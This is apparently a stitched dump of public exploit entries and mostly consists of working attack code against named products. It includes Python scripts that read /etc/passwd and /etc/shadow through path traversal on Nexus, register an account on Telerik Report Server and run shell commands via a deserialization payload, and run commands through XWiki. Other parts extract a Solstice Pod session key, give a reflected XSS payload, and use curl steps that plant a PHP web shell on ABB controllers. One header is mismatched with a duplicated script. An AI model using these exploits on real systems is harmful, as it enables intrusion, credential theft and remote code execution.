/ ___\ \ / / ____| |___ \ / _ \___ \| || | | || | / _ \| ___| / /_
| | \ \ / /| _| __) | | | |__) | || |_ | || || (_) |___ \| '_ \
| |___ \ V / | |___ / __/| |_| / __/|__ _| |__ _\__, |___) | (_) |
\____| \_/ |_____| |_____|\___/_____| |_| |_| /_/|____/ \___/
__ __ _ _____ _
\ \ / /__ _ __ _ _ | | __ _ _____ _ |_ _|__ ___| |__
\ \ / / _ \ '__| | | | | | / _` |_ / | | | | |/ _ \/ __| '_ \
\ V / __/ | | |_| | | |__| (_| |/ /| |_| | | | __/ (__| | | |
\_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_|
|___/ |___/
{bold}{white}@VeryLazyTech - Medium {reset}\n"""
return banner
def read_ip_port_list(file_path):
with open(file_path, 'r') as file:
lines = file.readlines()
return [line.strip() for line in lines]
def make_request(ip_port, url_path):
url = f"http://{ip_port}/{url_path}"
try:
response = requests.get(url, timeout=5)
return response.text
except requests.RequestException as e:
return None
def main(ip_port_list):
for ip_port in ip_port_list:
for url_path in ["%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/passwd", "%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/shadow"]:
response_text = make_request(ip_port, url_path)
if response_text and "nexus:x:200:200:Nexus Repository Manager user:/opt/sonatype/nexus:/bin/false" not in response_text and "Not Found" not in response_text and "400 Bad Request" not in response_text and "root" in response_text:
print(f"Address: {ip_port}")
print(f"File Contents for passwd:\n{response_text}" if "passwd" in url_path else f"File Contents for shadow:\n{response_text}")
break
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=f"[{bold}{blue}Description{reset}]: {bold}{white}Vulnerability Detection and Exploitation tool for CVE-2024-4956", usage=argparse.SUPPRESS)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-u", "--url", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a URL or IP with port for vulnerability detection\n")
group.add_argument("-l", "--list", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a list of URLs or IPs for vulnerability detection\n")
args = parser.parse_args()
if args.list:
ip_port_list = read_ip_port_list(args.list)
print(banner())
main(ip_port_list)
elif args.url:
ip_port_list = [args.url]
print(banner())
main(ip_port_list)
else:
print(banner())
parser.print_help()
# Exploit Title: Progress Telerik Report Server 2024 Q1 (10.0.24.305) - Authentication Bypass
# Fofa Dork: title="Telerik Report Server"
# Date: 2024-09-22
# Exploit Author: VeryLazyTech
# GitHub: https://github.com/verylazytech/CVE-2024-4358
# Vendor Homepage: https://www.telerik.com/report-server
# Software Link: https://www.telerik.com/report-server
# Version: 2024 Q1 (10.0.24.305) and earlier
# Tested on: Windows Server 2019
# CVE: CVE-2024-4358
import aiohttp
import asyncio
from alive_progress import alive_bar
from colorama import Fore, Style
import os
import aiofiles
import time
import random
import argparse
from fake_useragent import UserAgent
import uvloop
import string
import zipfile
import base64
green = Fore.GREEN
magenta = Fore.MAGENTA
cyan = Fore.CYAN
mixed = Fore.RED + Fore.BLUE
red = Fore.RED
blue = Fore.BLUE
yellow = Fore.YELLOW
white = Fore.WHITE
reset = Style.RESET_ALL
bold = Style.BRIGHT
colors = [ green, cyan, blue]
random_color = random.choice(colors)
def banner():
banner = f"""{bold}{random_color}
______ _______ ____ ___ ____ _ _ _ _ _________ ___
/ ___\ \ / / ____| |___ \ / _ \___ \| || | | || ||___ / ___| ( _ )
| | \ \ / /| _| __) | | | |__) | || |_ _____| || |_ |_ \___ \ / _ \
| |___ \ V / | |___ / __/| |_| / __/|__ _|_____|__ _|__) |__) | (_) |
\____| \_/ |_____| |_____|\___/_____| |_| |_||____/____/ \___/
__ __ _ _____ _
\ \ / /__ _ __ _ _ | | __ _ _____ _ |_ _|__ ___| |__
\ \ / / _ \ '__| | | | | | / _` |_ / | | | | |/ _ \/ __| '_ \
\ V / __/ | | |_| | | |__| (_| |/ /| |_| | | | __/ (__| | | |
\_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_|
|___/ |___/
{bold}{white}@VeryLazyTech - Medium {reset}\n"""
return banner
print(banner())
parser = argparse.ArgumentParser(description=f"[{bold}{blue}Description{reset}]: {bold}{white}Vulnerability Detection and Exploitation tool for CVE-2024-4358" , usage=argparse.SUPPRESS)
parser.add_argument("-u", "--url", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a URL or IP wtih port for vulnerability detection")
parser.add_argument("-l", "--list", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a list of URLs or IPs for vulnerability detection")
parser.add_argument("-c", "--command", type=str, default="id", help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a shell command to execute it")
parser.add_argument("-t", "--threads", type=int, default=1, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Number of threads for list of URLs")
parser.add_argument("-proxy", "--proxy", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Proxy URL to send request via your proxy")
parser.add_argument("-v", "--verbose", action="store_true", help=f"[{bold}{blue}INF{reset}]: {bold}{white}Increases verbosity of output in console")
parser.add_argument("-o", "--output", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Filename to save output of vulnerable target{reset}]")
args=parser.parse_args()
async def report(result):
try:
if args.output:
if os.path.isfile(args.output):
filename = args.output
elif os.path.isdir(args.output):
filename = os.path.join(args.output, f"results.txt")
else:
filename = args.output
else:
filename = "results.txt"
async with aiofiles.open(filename, "a") as w:
await w.write(result + '\n')
except KeyboardInterrupt as e:
quit()
except asyncio.CancelledError as e:
SystemExit
except Exception as e:
pass
async def randomizer():
try:
strings = string.ascii_letters
return ''.join(random.choices(strings, k=30))
except Exception as e:
print(f"Exception in randomizer :{e}, {type(e)}")
async def exploit(payload,url, authToken, session, user, psw):
try:
randomReport = await randomizer()
headers = {"Authorization" : f"Bearer {authToken}"}
body1 = {"reportName":randomReport,
"categoryName":"Samples",
"description":None,
"reportContent":payload,
"extension":".trdp"
}
proxy = args.proxy if args.proxy else None
async with session.post( f"{url}/api/reportserver/report", ssl=False, timeout=30, proxy=proxy, json=body1, headers=headers) as response1:
if response1.status !=200:
print(f"[{bold}{green}Vulnerale{reset}]: {bold}{white}Report for: {url}\n Login Crendentials: Usename: {user} | Password: {psw} | Authentication Token: {authToken}\n Deserialization RCE: Failed{reset}")
await report(f"Report for: {url}\n Login Crendentials: Usename: {user} | Password: {psw} | Authentication Token: {authToken}\n Deserialization RCE: Failed\n----------------------------------")
return
async with session.post( f"{url}/api/reports/clients", json={"timeStamp":None}, ssl=False, timeout=30) as response2:
if response2.status == 200:
responsed2 = await response2.json()
id = responsed2['clientId']
else:
print(f"[{bold}{green}Vulnerale{reset}]: {bold}{white}Report for: {url}\n Login Crendentials: Usename: {user} | Password: {psw} | Authentication Token: {authToken}\n Report created: {randomReport}\n Deserialization RCE: Failed{reset}")
await report(f"Report for: {url}\n Login Crendentials: Usename: {user} | Password: {psw} | Authentication Token: {authToken}\n Report created: {randomReport}\n Deserialization RCE: Failed\n----------------------------------")
return
body2 ={"report":f"NAME/Samples/{randomReport}/",
"parameterValues":{}
}
async with session.post( f"{url}/api/reports/clients/{id}/parameters", json=body2, proxy=proxy, ssl=False, timeout=30) as finalresponse:
print(f"[{bold}{green}Vulnerale{reset}]: {bold}{white}Report for: {url}\n Login Crendentials: Usename: {user} | Password: {psw} | Authentication Token: {authToken}\n Report created: {randomReport}\n Deserialization RCE: Success{reset}")
await report(f"Report for: {url}\n Login crendential: Usename: {user} | Password: {psw} | Authentication Token: {authToken}\n Report created: {randomReport}\n Deserialization RCE: Success\n----------------------------------")
except KeyError as e:
pass
except aiohttp.ClientConnectionError as e:
if args.verbose:
print(f"[{bold}{yellow}WRN{reset}]: {bold}{white}Timeout reached for {url}{reset}")
except TimeoutError as e:
if args.verbose:
print(f"[{bold}{yellow}WRN{reset}]: {bold}{white}Timeout reached for {url}{reset}")
except KeyboardInterrupt as e:
SystemExit
except aiohttp.client_exceptions.ContentTypeError as e:
pass
except asyncio.CancelledError as e:
SystemExit
except aiohttp.InvalidURL as e:
pass
except Exception as e:
print(f"Exception at authexploit: {e}, {type(e)}")
async def create(url,user, psw, session):
try:
base_url=f"{url}/Startup/Register"
body = {"Username": user,
"Password": psw,
"ConfirmPassword": psw,
"Email": f"{user}@{user}.org",
"FirstName": user,
"LastName": user}
headers = {
"User-Agent": UserAgent().random,
"Content-Type": "application/x-www-form-urlencoded",
}
async with session.post(base_url, headers=headers, data=body, ssl=False, timeout=30) as response:
if response.status == 200:
return "success"
return "failed"
except KeyError as e:
pass
except aiohttp.ClientConnectionError as e:
if args.verbose:
print(f"[{bold}{yellow}WRN{reset}]: {bold}{white}Timeout reached for {url}{reset}")
except TimeoutError as e:
if args.verbose:
print(f"[{bold}{yellow}WRN{reset}]: {bold}{white}Timeout reached for {url}{reset}")
except KeyboardInterrupt as e:
SystemExit
except asyncio.CancelledError as e:
SystemExit
except aiohttp.InvalidURL as e:
pass
except aiohttp.client_exceptions.ContentTypeError as e:
pass
except Exception as e:
print(f"Exception at authexploitcreate: {e}, {type(e)}")
async def login(url, user, psw, session):
try:
base_url = f"{url}/Token"
body = {"grant_type": "password","username":user, "password": psw}
headers = {
"User-Agent": UserAgent().random,
"Content-Type": "application/x-www-form-urlencoded",
}
async with session.post( base_url, data=body, headers=headers, ssl=False, timeout=30) as response:
if response.status == 200:
responsed = await response.json()
return responsed['access_token']
except KeyError as e:
pass
except aiohttp.ClientConnectionError as e:
if args.verbose:
print(f"[{bold}{yellow}WRN{reset}]: {bold}{white}Timeout reached for {url}{reset}")
except TimeoutError as e:
if args.verbose:
print(f"[{bold}{yellow}WRN{reset}]: {bold}{white}Timeout reached for {url}{reset}")
except KeyboardInterrupt as e:
SystemExit
except asyncio.CancelledError as e:
SystemExit
except aiohttp.InvalidURL as e:
pass
except aiohttp.client_exceptions.ContentTypeError as e:
pass
except Exception as e:
print(f"Exception at authexploitLogin: {e}, {type(e)}")
async def streamwriter():
try:
with zipfile.ZipFile("payloads.trdp", 'w') as zipf:
zipf.writestr('[Content_Types].xml', '''<?xml version="1.0" encoding="utf-8"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="xml" ContentType="application/zip" /></Types>''')
zipf.writestr("definition.xml", f'''<Report Width="6.5in" Name="oooo"
xmlns="http://schemas.telerik.com/reporting/2023/1.0">
<Items>
<ResourceDictionary
xmlns="clr-namespace:System.Windows;Assembly:PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"
xmlns:System="clr-namespace:System;assembly:mscorlib"
xmlns:Diag="clr-namespace:System.Diagnostics;assembly:System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
xmlns:ODP="clr-namespace:System.Windows.Data;Assembly:PresentationFramework, Version=4.0.0.0, Culture=neutral,
PublicKeyToken=31bf3856ad364e35"
>
<ODP:ObjectDataProvider MethodName="Start" >
<ObjectInstance>
<Diag:Process>
<StartInfo>
<Diag:ProcessStartInfo FileName="cmd" Arguments="/c {args.command}"></Diag:ProcessStartInfo>
</StartInfo>
</Diag:Process>
</ObjectInstance>
</ODP:ObjectDataProvider>
</ResourceDictionary>
</Items>''')
except Exception as e:
print(f"Exception at streamwriter: {e}, {type(e)}")
async def streamreader(file):
try:
async with aiofiles.open(file, 'rb') as file:
contents = await file.read()
bs64encrypted = base64.b64encode(contents).decode('utf-8')
return bs64encrypted
except Exception as e:
print(f"Exception at streamreder: {e}, {type(e)}")
async def core(url, sem, bar):
try:
user = await randomizer()
password = await randomizer()
async with aiohttp.ClientSession() as session:
status = await create(url, user, password, session)
if status == "success":
await asyncio.sleep(0.001)
authJWT = await login(url, user, password, session)
if authJWT:
payloads = await streamreader("payloads.trdp")
await exploit(payloads, url, authJWT, session, user, password)
await asyncio.sleep(0.002)
except Exception as e:
print(f"Exception at core: {e}, {type(e)}")
finally:
bar()
sem.release()
async def loader(urls, session, sem, bar):
try:
tasks = []
for url in urls:
await sem.acquire()
task = asyncio.ensure_future(core(url, sem, bar))
tasks.append(task)
await asyncio.gather(*tasks, return_exceptions=True)
except KeyboardInterrupt as e:
SystemExit
except asyncio.CancelledError as e:
SystemExit
except Exception as e:
print(f"Exception in loader: {e}, {type(e)}")
async def threads(urls):
try:
urls = list(set(urls))
sem = asyncio.BoundedSemaphore(args.threads)
customloops = uvloop.new_event_loop()
asyncio.set_event_loop(loop=customloops)
loops = asyncio.get_event_loop()
async with aiohttp.ClientSession(loop=loops) as session:
with alive_bar(title=f"Exploiter", total=len(urls), enrich_print=False) as bar:
loops.run_until_complete(await loader(urls, session, sem, bar))
except RuntimeError as e:
pass
except KeyboardInterrupt as e:
SystemExit
except Exception as e:
print(f"Exception in threads: {e}, {type(e)}")
async def main():
try:
urls = []
if args.url:
if args.url.startswith("https://") or args.url.startswith("http://"):
urls.append(args.url)
else:
new_url = f"https://{args.url}"
urls.append(new_url)
new_http = f"http://{args.url}"
urls.append(new_http)
await streamwriter()
await threads(urls)
if args.list:
async with aiofiles.open(args.list, "r") as streamr:
async for url in streamr:
url = url.strip()
if url.startswith("https://") or url.startswith("http://"):
urls.append(url)
else:
new_url = f"https://{url}"
urls.append(new_url)
new_http = f"http://{url}"
urls.append(new_http)
await streamwriter()
await threads(urls)
except FileNotFoundError as e:
print(f"[{bold}{red}WRN{reset}]: {bold}{white}{args.list} no such file or directory{reset}")
SystemExit
except Exception as e:
print(f"Exception in main: {e}, {type(3)})")
if __name__ == "__main__":
asyncio.run(main())
# Exploit Title: Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)
# Fofa Dork: "HttpFileServer" && server=="HFS 2.3m"
# Date: 2024-09-22
# Exploit Author: VeryLazyTech
# GitHub: https://github.com/verylazytech/CVE-2024-23692
# Vendor Homepage: http://rejetto.com/hfs/
# Software Link: http://rejetto.com/hfs/
# Version: 2.3m
# Tested on: Windows 10
# CVE: CVE-2024-23692
import requests
import random
import argparse
from colorama import Fore, Style
green = Fore.GREEN
magenta = Fore.MAGENTA
cyan = Fore.CYAN
mixed = Fore.RED + Fore.BLUE
red = Fore.RED
blue = Fore.BLUE
yellow = Fore.YELLOW
white = Fore.WHITE
reset = Style.RESET_ALL
bold = Style.BRIGHT
colors = [green, cyan, blue]
random_color = random.choice(colors)
def banner():
banner = f"""{bold}{random_color}
______ _______ ____ ___ ____ _ _ _ _ ___ ____ __
/ ___\ \ / / ____| |___ \ / _ \___ \| || | | || | / _ \| ___| / /_
| | \ \ / /| _| __) | | | |__) | || |_ | || || (_) |___ \| '_ \
| |___ \ V / | |___ / __/| |_| / __/|__ _| |__ _\__, |___) | (_) |
\____| \_/ |_____| |_____|\___/_____| |_| |_| /_/|____/ \___/
__ __ _ _____ _
\ \ / /__ _ __ _ _ | | __ _ _____ _ |_ _|__ ___| |__
\ \ / / _ \ '__| | | | | | / _` |_ / | | | | |/ _ \/ __| '_ \
\ V / __/ | | |_| | | |__| (_| |/ /| |_| | | | __/ (__| | | |
\_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_|
|___/ |___/
{bold}{white}@VeryLazyTech - Medium {reset}\n"""
return banner
def read_ip_port_list(file_path):
with open(file_path, 'r') as file:
lines = file.readlines()
return [line.strip() for line in lines]
def make_request(ip_port, url_path):
url = f"http://{ip_port}/{url_path}"
try:
response = requests.get(url, timeout=5)
return response.text
except requests.RequestException as e:
return None
def main(ip_port_list):
for ip_port in ip_port_list:
for url_path in ["%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/passwd", "%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/shadow"]:
response_text = make_request(ip_port, url_path)
if response_text and "nexus:x:200:200:Nexus Repository Manager user:/opt/sonatype/nexus:/bin/false" not in response_text and "Not Found" not in response_text and "400 Bad Request" not in response_text and "root" in response_text:
print(f"Address: {ip_port}")
print(f"File Contents for passwd:\n{response_text}" if "passwd" in url_path else f"File Contents for shadow:\n{response_text}")
break
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=f"[{bold}{blue}Description{reset}]: {bold}{white}Vulnerability Detection and Exploitation tool for CVE-2024-4956", usage=argparse.SUPPRESS)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-u", "--url", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a URL or IP with port for vulnerability detection\n")
group.add_argument("-l", "--list", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a list of URLs or IPs for vulnerability detection\n")
args = parser.parse_args()
if args.list:
ip_port_list = read_ip_port_list(args.list)
print(banner())
main(ip_port_list)
elif args.url:
ip_port_list = [args.url]
print(banner())
main(ip_port_list)
else:
print(banner())
parser.print_help()
# Exploit Title: CVE-2023-48292 Remote Code Execution Exploit
# Google Dork: N/A
# Date: 23 March 2025
# Exploit Author: Mehran Seifalinia
# Vendor Homepage: https://www.xwiki.org/
# Software Link: https://www.xwiki.org/xwiki/bin/view/Download/
# Version: XWiki Standard 14.10
# Tested on: Ubuntu 20.04 LTS with OpenJDK 11
# CVE : CVE-2023-48292
from argparse import ArgumentParser
import sys
import logging
from requests import get, post, RequestException
import validators
# Constants
CVE_NAME = "CVE-2023-48292"
HEADERS = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
}
# Configure logging
def setup_logging(logfile):
logger = logging.getLogger()
logger.setLevel(logging.INFO)
# Create a logging handler for console output
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s'))
logger.addHandler(console_handler)
# Create a logging handler for file output
file_handler = logging.FileHandler(logfile)
file_handler.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s'))
logger.addHandler(file_handler)
def validate_url(url):
"""
Validate the URL to ensure it has the correct format and starts with 'http://' or 'https://'.
"""
if not validators.url(url):
logging.error("Invalid target URL format. It must start with 'http://' or 'https://'.")
sys.exit(1)
return url.rstrip("/")
def check_vulnerability(target_url, method):
"""
Check if the target URL is vulnerable to the CVE-2023-48292 vulnerability.
We send a test payload and inspect the response to determine if the vulnerability exists.
"""
try:
# Test payload to check for vulnerability
test_payload = "echo 'testtesttest1234'" # Payload to execute a test command on the target system
vulnerable_url = f"{target_url}/xwiki/bin/view/Admin/RunShellCommand?command={test_payload}"
if method == "GET":
response = get(vulnerable_url, headers=HEADERS)
else: # method == "POST"
response = post(vulnerable_url, headers=HEADERS)
if response.status_code == 200 and "testtesttest1234" in response.text:
logging.info("Target is vulnerable! Command execution test succeeded.")
return True
else:
logging.info("Target does not appear to be vulnerable.")
return False
except RequestException as error:
logging.error(f"HTTP Request Error: {error}")
sys.exit(1)
def perform_attack(target_url, payload, method):
"""
Perform the attack by sending a custom payload to the vulnerable server.
"""
try:
logging.info(f"Attempting attack with payload: {payload}")
vulnerable_url = f"{target_url}/xwiki/bin/view/Admin/RunShellCommand?command={payload}"
if method == "GET":
response = get(vulnerable_url, headers=HEADERS)
else: # method == "POST"
response = post(vulnerable_url, headers=HEADERS)
if response.status_code == 200:
logging.info(f"Attack successful! Response: {response.text[:100]}...") # Display a snippet of the response
else:
logging.warning("Attack attempt failed.")
except RequestException as error:
logging.error(f"HTTP Request Error: {error}")
sys.exit(1)
def main():
"""
Main function to parse command-line arguments, check for vulnerability, and optionally perform the attack.
"""
parser = ArgumentParser(description=f"{CVE_NAME} Exploit Script")
parser.add_argument("target", help="Target URL (e.g., https://vulnsite.com)")
parser.add_argument("--exploit", action="store_true", help="Perform attack with a payload")
parser.add_argument("--payload", default="echo 'testtesttest1234'", help="Custom payload for exploitation")
parser.add_argument("--method", choices=["GET", "POST"], default="GET", help="HTTP method to use (GET or POST)")
parser.add_argument("--logfile", default="exploit.log", help="Log file to store results")
args = parser.parse_args()
# Set up logging to file and console
setup_logging(args.logfile)
# Validate the target URL
target_url = validate_url(args.target)
logging.info("Checking the target for vulnerability...")
if check_vulnerability(target_url, args.method):
if args.exploit:
# Perform the attack with the provided payload
perform_attack(target_url, args.payload, args.method)
else:
logging.info("Run with '--exploit' to attempt the attack.")
else:
logging.warning("The target is not vulnerable. Exiting.")
if __name__ == "__main__":
main()
# Exploit Title: Solstice Pod API Session Key Extraction via API Endpoint
# Google Dork: N/A
# Date: 1/17/2025
# Exploit Author: The Baldwin School Ethical Hackers
# Vendor Homepage: https://www.mersive.com/
# Software Link: https://documentation.mersive.com/en/solstice/about-solstice.html
# Versions: 5.5, 6.2
# Tested On: Windows 10, macOS, Linux
# CVE: N/A
# Description: This exploit takes advantage of an unauthenticated API endpoint (`/api/config`) on the Solstice Pod, which exposes sensitive information such as the session key, server version, product details, and display name. By accessing this endpoint without authentication, attackers can extract live session information.
# Notes: This script extracts the session key, server version, product name, product variant, and display name from the Solstice Pod API. It does not require authentication to interact with the vulnerable `/api/config` endpoint.
# Impact: Unauthorized users can extract session-related information without authentication. The exposed data could potentially lead to further exploitation or unauthorized access.
#!/usr/bin/env python3
import requests
import ssl
from requests.adapters import HTTPAdapter
from urllib3.poolmanager import PoolManager
# Create an adapter to specify the SSL/TLS version and disable hostname verification
class SSLAdapter(HTTPAdapter):
def __init__(self, ssl_context=None, **kwargs):
# Set the default context if none is provided
if ssl_context is None:
ssl_context = ssl.create_default_context()
ssl_context.set_ciphers('TLSv1.2') # Force TLSv1.2 (or adjust to other versions if needed)
ssl_context.check_hostname = False # Disable hostname checking
ssl_context.verify_mode = ssl.CERT_NONE # Disable certificate validation
self.ssl_context = ssl_context
super().__init__(**kwargs)
def init_poolmanager(self, *args, **kwargs):
kwargs['ssl_context'] = self.ssl_context
return super().init_poolmanager(*args, **kwargs)
# Prompt the user for the IP address
ip_address = input("Please enter the IP address: ")
# Format the URL with the provided IP address
url = f"https://{ip_address}:8443/api/config"
# Create a session and mount the adapter
session = requests.Session()
adapter = SSLAdapter()
session.mount('https://', adapter)
# Send the request to the IP address
response = session.get(url, verify=False) # verify=False to ignore certificate warnings
if response.status_code == 200:
# Parse the JSON response
data = response.json()
# Extract the sessionKey, serverVersion, productName, productVariant, and displayName values from the response
session_key = data.get("m_authenticationCuration", {}).get("sessionKey")
server_version = data.get("m_serverVersion")
product_name = data.get("m_productName")
product_variant = data.get("m_productVariant")
display_name = data.get("m_displayInformation", {}).get("m_displayName")
# Print the extracted values
if session_key:
print(f"Session Key: {session_key}")
else:
print("sessionKey not found in the response.")
if server_version:
print(f"Server Version: {server_version}")
else:
print("serverVersion not found in the response.")
if product_name:
print(f"Product Name: {product_name}")
else:
print("productName not found in the response.")
if product_variant:
print(f"Product Variant: {product_variant}")
else:
print("productVariant not found in the response.")
if display_name:
print(f"Display Name: {display_name}")
else:
print("displayName not found in the response.")
else:
print(f"Failed to retrieve data. HTTP Status code: {response.status_code}")
# Exploit Title: Elaine's Realtime CRM Automation 6.18.17 - Reflected XSS
# Date: 09/2024
# Exploit Author: Haythem Arfaoui (CBTW Team)
# Vendor Homepage: https://www.elaine.io/
# Software Link:
https://www.elaine.io/en/products/elaine-marketing-automation/
# Version: 6.18.17 and below
# Tested on: Windows, Linux
# CVE : CVE-2024-42831
# Description
A reflected cross-site scripting (XSS) vulnerability in Elaine's Realtime
CRM Automation v6.18.17 allows attackers to execute arbitrary JavaScript
code in the web browser of a user via injecting a crafted payload into the
dialog parameter at wrapper_dialog.php.
# Steps to reproduce:
1. Navigate to any website that contains Elaine's Realtime CRM Automation
2. Navigate to this endpoint: /system/interface/wrapper_dialog.php
3. Append the payload *a"%20onafterscriptexecute=alert(document.domain)> *in
the *"dialog*" param and execute the request
4. Final URL
: /system/interface/wrapper_dialog.php?dialog=a"%20onafterscriptexecute=alert(document.domain)>
# Exploit Title : ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.01
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB BMS/BAS controller suffers from a remote code execution
vulnerability. The vulnerable uploadFile() function in bigUpload.php
improperly reads raw POST data using the php://input wrapper without
sufficient validation. This data is passed to the fwrite() function,
allowing arbitrary file writes. Combined with an improper sanitization
of file paths, this leads to directory traversal, allowing an attacker
to upload malicious files to arbitrary locations. Once a malicious file
is written to an executable directory, an authenticated attacker can
trigger the file to execute code and gain unauthorized access to the
building controller.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5828
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5828.php
CVE ID: CVE-2024-6298
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-6298
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
1.
$ curl -X POST "http://192.168.73.31/bigUpload.php?action=upload&key=251" \
> -H "Cookie: PHPSESSID=25131337" \
> -H "Content-Type: application/x-www-form-urlencoded" \
> -d "<?php\r\nif ($_GET['j']) {\r\nsystem($_GET['j']);\r\n}\r\n?>"
2.
$ curl -X POST "http://192.168.73.31/bigUpload.php?action=upload&key=251" \
> -H "Cookie: PHPSESSID=25131337" \
> –H "Content-Type: application/x-www-form-urlencoded"
3.
$ curl -X POST "http://192.168.73.31/bigUpload.php?action=finish" \
> -H "Cookie: PHPSESSID=25131337" \
> -H "Content-Type: application/x-www-form-urlencoded" \
> -d "key=251&name=../../../../../../../home/MIX_CMIX/htmlroot/ZSL.php"
4.
$ curl http://192.168.73.31/ZSL.php?j=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
# Exploit Title : ABB Cylon Aspect 3.08.01 - Arbitrary File Delete
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.01
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The BMS/BAS controller suffers from an arbitrary file deletion vulnerability.
Input passed to the 'file' parameter in 'databasefiledelete.php' is not properly
sanitised before being used to delete files. This can be exploited by an unauthenticated
attacker to delete files with the permissions of the web server using directory
traversal sequences passed within the affected POST parameter.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
